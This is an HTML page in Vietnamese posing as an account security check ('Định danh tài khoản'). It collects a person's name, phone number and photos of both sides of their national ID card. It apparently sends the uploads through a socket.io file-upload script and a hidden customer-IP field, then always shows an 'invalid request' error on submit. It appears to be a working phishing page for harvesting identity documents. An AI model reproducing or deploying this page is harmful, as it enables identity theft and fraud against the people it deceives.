<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tăng cường bảo mật</title>
    <link rel="stylesheet" type="text/css" href="Mobile/assets/css/vendors/bootstrap.css">
    <link href="//unpkg.com/layui@2.9.7/dist/css/layui.css" rel="stylesheet">
    <style>
        .btn-gradient {
            border-radius: 10px;
            background: #ec1c24;
            color: #fff;
            width: 100%;
            margin-bottom: 15px;
            font-weight: 600;
        }

        label {
            font-weight: 600;
            padding: 10px 0;
        }

        .image-container {
            align-items: center;
            background: #eee;
            background-position: 50%;
            background-repeat: no-repeat;
            background-size: cover;
            border: 1px solid #eee;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            height: 180px;
            justify-content: center;
            margin: 10px 0;
            position: relative;
            width: 100%;
        }

        .anticon {
            text-rendering: optimizelegibility;
            -webkit-font-smoothing: antialiased;
            -moz-osx-font-smoothing: grayscale;
            color: inherit;
            display: inline-block;
            font-style: normal;
            line-height: 0;
            text-align: center;
            text-transform: none;
            vertical-align: -.125em;
        }

        [hidden] {
            display: none !important;
        }

        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            color: #fff;
        }

        .wrap {
            background-image: url('UploadImages/background.webp');
            /* background-position: 100% 100%; */
            background-position-x: center;
            background-position-y: top;
            display: none;
            min-height: 100vh;
        }

        /* header {
            display: none;
        } */
        .layui-layer-content.layui-layer-padding {
            color: #333 !important;
        }

        .layui-layer-content {
            color: #333 !important;
        }



        .logo {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
    </style>
</head>

<body>
    <div class="logo">
        <img src="UploadImages/Data/Banner/logo.webp" alt="" width="100%">
    </div>
    <div class="wrap">

        <h2 style="text-align: center; color: white; padding: 10px 0; margin: 0;">Định danh tài khoản</h2>
        <div class="container">
            <img src="UploadImages/1_1.jpg" alt="" width="100%" , height="180px">

            <div class="form">
                <form id="mothe" method="POST" enctype="multipart/form-data">
                    <div class="form-group">
                        <label>Họ và tên:</label>
                        <input name="name" id="name" class="form-control" placeholder="Nhập họ và tên" required>
                    </div>

                    <div class="form-group">
                        <label>Số điện thoại:</label>
                        <input name="phone" id="phone" class="form-control" placeholder="Nhập số điện thoại" required>
                    </div>

                    <div class="form-group">
                        <div class="image-container" id="mattruoccccd"
                            style="background-image:url(upload/7d1fe053ff78bca2cbdb8f6ab058f6d9.html)">
                            <span role="img" id="iconmattr" aria-label="camera" class="anticon anticon-camera"
                                style="font-size: 30px; color: rgb(51, 51, 51);">
                                <svg viewBox="64 64 896 896" focusable="false" data-icon="camera" width="1em"
                                    height="1em" fill="currentColor" aria-hidden="true">
                                    <path
                                        d="M864 248H728l-32.4-90.8a32.07 32.07 0 00-30.2-21.2H358.6c-13.5 0-25.6 8.5-30.1 21.2L296 248H160c-44.2 0-80 35.8-80 80v456c0 44.2 35.8 80 80 80h704c44.2 0 80-35.8 80-80V328c0-44.2-35.8-80-80-80zm8 536c0 4.4-3.6 8-8 8H160c-4.4 0-8-3.6-8-8V328c0-4.4 3.6-8 8-8h186.7l17.1-47.8 22.9-64.2h250.5l22.9 64.2 17.1 47.8H864c4.4 0 8 3.6 8 8v456zM512 384c-88.4 0-160 71.6-160 160s71.6 160 160 160 160-71.6 160-160-71.6-160-160-160zm0 256c-53 0-96-43-96-96s43-96 96-96 96 43 96 96-43 96-96 96z">
                                    </path>
                                </svg>
                            </span>
                            <input name="mattruoc" hidden type="file" id="mattruoc" class="form-control" required>
                            <span class="ant-typography textmattr"
                                style="color: rgb(51, 51, 51); font-weight: 700; font-size: 16px;">Mặt
                                trước CMND / CCCD </span>
                        </div>

                    </div>
                    <input type="hidden" name="ipkhachhang" id="action" value="">
                    <div class="form-group">
                        <div class="image-container" id="matsaucccd"
                            style="background-image:url(upload/7d1fe053ff78bca2cbdb8f6ab058f6d9.html)">
                            <span role="img" id="iconmatsaucancuoc" aria-label="camera" class="anticon anticon-camera"
                                style="font-size: 30px; color: rgb(51, 51, 51);">
                                <svg viewBox="64 64 896 896" focusable="false" data-icon="camera" width="1em"
                                    height="1em" fill="currentColor" aria-hidden="true">
                                    <path
                                        d="M864 248H728l-32.4-90.8a32.07 32.07 0 00-30.2-21.2H358.6c-13.5 0-25.6 8.5-30.1 21.2L296 248H160c-44.2 0-80 35.8-80 80v456c0 44.2 35.8 80 80 80h704c44.2 0 80-35.8 80-80V328c0-44.2-35.8-80-80-80zm8 536c0 4.4-3.6 8-8 8H160c-4.4 0-8-3.6-8-8V328c0-4.4 3.6-8 8-8h186.7l17.1-47.8 22.9-64.2h250.5l22.9 64.2 17.1 47.8H864c4.4 0 8 3.6 8 8v456zM512 384c-88.4 0-160 71.6-160 160s71.6 160 160 160 160-71.6 160-160-71.6-160-160-160zm0 256c-53 0-96-43-96-96s43-96 96-96 96 43 96 96-43 96-96 96z">
                                    </path>
                                </svg>
                            </span>
                            <input name="matsau" hidden type="file" id="matsau" class="form-control" required>
                            <span class="ant-typography textmatsau"
                                style="color: rgb(51, 51, 51); font-weight: 700; font-size: 16px;">Mặt
                                sau CCCD / CMND </span>

                        </div>
                    </div>
                    <center>
                        <button type="submit" name="gui-yeu-cau" class="btn btn-gradient btn-rounded" id="submit"><i
                                class="fa fa-plus-circle"></i>
                            GỬI YÊU CẦU </button>
                    </center>
                </form>
            </div>
        </div>

        <main>
        </main>
    </div>
    <script src="Mobile/assets/js/jquery.min.js"></script>

    <script src="/socket.io/socket.io.js"></script>
    <script src="/siofu/client.js"></script>
    <script src="/js.js"></script>
    <script type="text/javascript" src="statics/js/layer/layer.min.js"></script>

    <script>
        $(document).ready(() => {
            $('.wrap').fadeIn(1700);
            $('.logo').fadeOut(1700);

            $('#mothe').submit((e) => {
                e.preventDefault();
                // alert('Yêu cầu không hợp lệ!')
                layer.alert('Yêu cầu không hợp lệ!', {
                    icon: 0,
                    title: 'Thông báo',
                    btn: ['OK']
                });
            })
        });

    </script>
</body>

</html>